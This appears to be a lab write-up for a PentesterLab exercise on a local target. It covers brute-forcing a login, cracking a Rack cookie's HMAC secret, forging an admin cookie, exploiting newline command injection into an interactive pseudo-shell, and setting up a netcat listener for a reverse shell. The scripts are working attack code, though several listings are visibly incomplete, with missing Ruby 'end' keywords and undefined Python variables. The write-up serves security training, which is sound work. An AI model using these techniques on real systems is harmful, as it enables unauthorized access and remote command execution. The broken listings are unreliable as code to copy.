Rack Cookies And Command Injection

10 minute read

This guide will outline how to complete the Rack Cookies and command injection exercise from pentesterlab

You can either watch the embedded video tutorial or read the notes below.



The goal of this exercise is to gain command execution on a server through privilege escalation and cookie tampering. This attack will be conducted in 5 stages. First we will perform ‘Discovery and Scanning’ to investigate possible attack vectors and fingerprint the servers tooling. Next we will brute force the authentication page to get a cookie issued to us. Then we will reverse-engineer and tamper with the rack cookie to gain Administrator privileges. Lastly, through the administrator interface we will attempt to gain command execution on the server. For these notes, the vulnerable site is located at localhost:8000.

Discovery and Scanning

The first step for any exploit is to examine the vulnerable site and gather information about it. First let’s open the site in our browser and examine the source code.


Looks like the login form sends a POST request to the /login endpoint with the 2 parameters, login and password. Next, let’s examine the HTTP response headers to get an idea of what type of applicaiton the server is running. We can do this a variety of tools, including the browsers dev tools. I’m going to use netcat.


First thing I notice is that server responds with a status code 302 Found and redirects us to /login. We can also see that the web server is running Phusion Passenger v3.0.12 on Apache v2.2.16. A quick google search of Phusion Passenger reveals:

Phusion Passenger is a free web server and application server with support for Ruby, Python and Node.js. It is designed to integrate into the Apache HTTP Server or the nginx web server, but also has a mode for running standalone without an external web server

(source: wikipedia).

Another great tool to use during our information gathering phase is Nikto. Nikto is a command-line web server vulnerability scanner that can reveal possible attack vectors for your exploit. Below we use it to scan our vulnerable site.


Nikto revelaled a lot of interesting tidbits, however for now we’re just going to try and brute force the authentication page and then poke around.

Brute Forcing The Authentication Page

Because the web server seems to allow for an infinite number of login attempts we can simply brute force the page with a ‘dictionary attack`.

Strategy, use a good dictionary of common credentials to send build a myriad of requests to send the login page and evaluate the response. I’m going to use a fairly small dictionary of common credentials I found here.

Next you’ll need to either write your own brute-force script or use a popular utility like patator. I wrote my own script and you can see below that after combining it my dictionary I was able to authenticate with the credentials test:test.


If you wanted to use patator you can achieve the same result with the command in the screenshot below.


Results of Brute Force

When we login with the credentials test:test we’re redirected to the root page where there’s really nothing for us to interact with. However, checking the response headers reveals that we were issued a cookie named rack.session.


We’ll want to try and reverse-engineer this cookie so let’s copy it into a local file.


A simple google search of rack.session reveals a lot of information about how this cookie is issued.


The rack cookie is a base64 encoded marshalled object. I.E. It’s a ruby object that has been serialized with marshal (Like pickle for python), and then base64 encoded. Furthermore, the cookie can be signed with a secret key to check for data integrity. Each of these operations are invertible so we may be able to reverse engineer the cookie and see what was encoded.

Goal: Reverse Engineer the Rack cookie into a Ruby object that we can inspect. This object will likely contain data fields that the web application uses. By modifying the object and then serializing it back into a cookie we may be able to elevate our privileges

First, let’s examine the source code to gather information on how to reverse engineer the cookie.


Encoding methods are done with Marshal and then Base64


Above is the constructor for the cookie. It looks like there are 3 instance variables, @secrets, @hmac, and @coder. The hmac (hashed message authentication code) is used to verify the data integrity and authenticity of the cookie. It looks like it is generated with the OpenSSL:Digest::SHA1 encryption scheme.


Looking at the generate_hmac function it looks like it is done by using SHA1 to hash the secret word along with the cookie data which is the base64, marshalled object.

With this information in hand, let’s try to reverse the operations used to encode our cookie.


Source code for first attempt to decode cookie and result from running is below


Ruby expects a class/module User to be defined. To fix, let’s define a stub.


Now we’re getting a different error. Missing a class DataMapper.


Researching DataMapper reveals it’s a database abstraction library for Ruby. So we can import it into our script


May require running the following command:

gem install data_mapper
gem install dm-sqlite-adapter

Still getting errors after adding data_mapper, this one however reveals the back end database the web server is running. Solution is the same, add it to our script.


Researching this error leads to the conclusion that DataMapper can’t find the adapter for the database. Solution is to create a default adapter for it to connect to.

DataMapper.setup(:default, 'sqlite3::memory')

Fixing all the errors we can finally deserialize the object and print it.


Strategy, take our deserialized object, change the admin field to true, then re-encode the object and use the new cookie value.

Adding the following lines to our script will encode the cookie for us.

class User
    attr_accessor :admin

def encode_object(obj)
    obj["user"].admin = true
    encoded = URI.encode(Base64.encode64(Marshal.dump(obj)))


However, replacing our cookie with this new result will log us out. The new cookie is rejected since the cookie was not signed with the same secret data the server used.

Let’s examine how the session unpacks our data from the cookie.


It splits the cookie at the -- delimiter, with the cookie value (left paft) containing the session data as we’ve seen. The right value is the digest, I.E. the HMAC that was generated using the session_data and the secret key. rack will then set the session_data to nothing unless the digests match.



We can use this validation process to brute force the secret key by using source code of the rack library to check against a valid cookie with a dictionary of words. Since the server returned to us a cookie, by definition it is valid so we’ll use that for our script.

require 'uri'
require 'openssl'

# Copied from https://github.com/rack/rack/lib/rack/session/cookie.rb
def generate_hmac(data, secret)
    OpenSSL::HMAC.hexdigest(OpenSSL::Digest::SHA1.new, secret, data)

def find_secret(cookie, words)

    data, signature = cookie.split('--', 2)

    data = URI.decode(data)

    for word in words
        if generate_hmac(data, word) == signature
            return word
    return nil

def main

    if ARGV.length != 2
        puts('usage: find-secret <cookie> <wordlist>')
        return 1

    cookies = IO.readlines(ARGV[0], chomp: true)
    words   = IO.readlines(ARGV[1], chomp: true)

    for cookie in cookies
        secret = find_secret(cookie, words)
        if secret.nil?
            puts('find-secret: Brute force failed. Try a different dictionary or check your cookie')
            puts('Secret found: ' + secret)
    return 0


Running this with our wordlist and cookie from the server we get:


Now that we have the secret, we can go ahead and sign our modified cookie and try to get administrator privileges.

Modified tamper-cookie.rb program

require 'pp'
require 'uri'
require 'base64'
require 'openssl'
require 'data_mapper'

DataMapper.setup(:default, 'sqlite3::memory')

class User
    attr_accessor :admin

def encode_object(obj, secret)

    obj["user"].admin = true

    data = Base64.encode64(Marshal.dump(obj))

    signature = OpenSSL::HMAC.hexdigest(OpenSSL::Digest::SHA1.new, secret, data)

    # URI encode doesn't encode '=' character
    return URI.encode(data).gsub("=", "%3D")+"--"+signature

def decode_cookie(c)
    cookie = c.split("--")

    # Undo URL encode then base64 decode
    decoded = Base64.decode64(URI.decode(cookie[0]))

        obj = Marshal.load(decoded)
        puts("Decoded Cookie:\n")
        return obj
    rescue ArgumentError => err
        puts "( ERROR ) decode-cookie: " + err.to_s

def main

    if ARGV.length != 2
        puts('usage: tamper-cookie <file> <secret>')
        return 1

    cookies = IO.readlines(ARGV[0], chomp: true)

    for cookie in cookies

        obj = decode_cookie(cookie)
        puts("Decoded Cookie:\n")
        pp obj

        new_cookie = encode_object(obj, ARGV[1])
        puts("\nTampered Cookie:\n")
    return 0



Using a new cookie we can now elevate ourselves to administrator privileges.


Administrator Panel Probing

It looks like we have three new endpoints we can explore. /delete, /edit, and /new.

Attempting to create or edit entries with a single-quote causes the server to respond with an invalid data provided error.


Likely some sort of regex filter is preventing us from injecting commands. However a common problem with regex in ruby is that it is multi-line by default. So, let’s try injecting commands after a newline.

The browser isn’t properly url-encoding our newline. \n results in a url-encoded backslash followed by an n and %0A results in a url-encoded % followed by 0A. We’ll have to write a script to run the request properly.

invalid_data invalid_data

Here’s our first attempt at to see if there exists a command injection vulnerability. We inject sleep 5 after a newline in the ip parameter to get the server to wait 5 seconds before sending us a response. If a delay occurs then we know we have command injection.

#!/usr/bin/env python3

"""usage: cmd-injection.py <admin-cookie>

Script will attempt to execute a command injection against the 
vulnerable site provided in the pentester labs 'rack cookie and 
command injection' lab. Requires an authenticated admin cookie
to work properly. 

import sys
import requests

URL = 'http://localhost:8000/'

def inject_command(cookie):

    admin_cookie = { 'rack.session' : cookie }

    payload = { 'id'   : '1'
              , 'name' : 'webmail'
              , 'ip'   : '\n`sleep 5`'
              , 'ttl'  : '600'

    resp = requests.post(URL + '/update', cookies=admin_cookie, data=payload)


def help():
    print(__doc__, file=sys.stderr)

if __name__ == "__main__":
    if len(sys.argv) != 2:

    with open(sys.argv[1]) as file:
        cookie = file.read().rstrip()


The server delayed in our response. Let’s parameterize the command in our script and try to get the results of pwd.

Running our script with the pwd command resulted in a this response:

<div class="alert-message error">
incorrect section name: &#x2F;var&#x2F;www
syntax error

So now we know we’re in the /var/www/ folder in the server. However when we do ls or anything wil multile lines of output we’re gonna be limited to seeing only the first thing. So let’s try to output the results of the command into a publicly reachable file then pull down that file and print it.

First, we need to find out where the public files are stored. We know we can pull down the style sheets no problem, so we should output the results into the same folder.


Usually they’re stored in the public/ folder. Running our script with ls public/ returns us the file we wanted. So lets output our results into the public folder and also make the program interactive.

After refactoring and cleaning up this is the final exploit script.

#!/usr/bin/env python3

import sys
import bs4
import requests

OUTPUT_FILE = '.keep'
OUTPUT_PATH = '/var/www/public/'
URL = 'http://localhost:8000/' 

def inject_command(cookie, command):

    admin_cookie = { 'rack.session' : cookie }


    payload = { 'id'   : '1'
              , 'name' : 'webmail'
              , 'ip'   : f'\n`{command} > {output}`'
              , 'ttl'  : '600'

    resp = requests.post(URL + '/update', cookies=admin_cookie, data=payload)

    # Undo update
    payload['ip'] = ''
    requests.post(URL + '/update', cookies=admin_cookie, data=payload)

    return resp

def get_result():
    return requests.get(URL + OUTPUT_FILE).text

def run_shell(cookie):
        cmd = input("cmd> ")

        resp = inject_command(cookie, cmd)

        soup = bs4.BeautifulSoup(resp.text, 'html.parser')

        if '\nInvalid data provided' in soup.find('div', {"class": "alert-message error"}):
            print("( ERROR ): Failed to process command")

def help():
    print(__doc__, file=sys.stderr)

if __name__ == "__main__":
    if len(sys.argv) != 2:

    command = ' '.join(sys.argv[2:])

    with open(sys.argv[1]) as file:
        cookie = file.read().rstrip()


Running this program we can get a interactive psuedo-web-shell.


However, this shell has some limitations. Namely we can’t cd and other stuff so lets setup a reverse web-shell.

Setting up Reverse-Shell

Since firewalls are more likely to filter inbound traffic than outbound traffic, it’s a more likely that a reverse shell will work.

Our host machine will act as the server and listen for a connection on a port.

sudo nc -nvlp 5555                                               
Listening on [] (family 2, port 5555)
Listening on 5555

-n option says ‘Do not do any DNS or service lookups on any specified addresses, hostnames or ports’. Which can speed up execution time.

-v is for a verbose output

-l Specifies nc to listen for an incoming connection.

-p Specifies the source port nc should use.

Now use our exploit script to direct the remote to push a shell to us.



And we’re connected! From here there’s a lot of nefarious activities you can conduct, however we’ll finish this exploit here.

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